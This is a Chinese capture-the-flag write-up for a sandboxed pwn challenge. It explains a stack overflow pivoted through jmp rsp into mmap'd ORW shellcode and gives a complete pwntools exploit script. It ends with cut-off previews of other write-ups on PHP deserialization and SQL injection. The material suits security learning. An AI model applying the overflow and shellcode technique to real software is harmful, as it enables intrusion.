檢查下程式的保護措施
拖入ida發現程式開啟了沙盒保護,隨即用seccomp-tools工具檢視下白名單
因此這題選擇用orw來get flag
函式允許我們輸入0x38個位元組,但buf只有0x20大小,並且只能溢位0x18個位元組,用buf來裝orw的彙編**是絕對不夠的,但程式一開始mmap了記憶體中的一段區域,我們可以利用這段區域來儲存我們的shellcode,並發現該程式有jmp rsp,利用jmp rsp可以直接執行棧上的內容
write up
from pwn import *
context(log_level = 'debug', arch = 'amd64', os = 'linux')
io=remote("node3.buuoj.cn",29801)
mmap=0x123000
jmp_rsp=0x400a01
payload=shellcraft.open("./flag")
payload+=shellcraft.read(3,mmap+0x100,100)
payload+=shellcraft.write(1,mmap+0x100,100)
payload=asm(payload)
payload1=asm(shellcraft.read(0,mmap,0x100))+asm("mov rax,0x123000; jmp rax")
payload1=payload1.ljust(0x28,b'a')
payload1+=p64(jmp_rsp)+asm("sub rsp,0x30; jmp rsp")
io.recv()
io.sendline(payload1)
io.sendline(payload)
io.interactive()
極客大挑戰 2019 PHP
開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...
極客大挑戰 2019 HardSQL wp
有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...
極客大挑戰 2019 PHP
剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...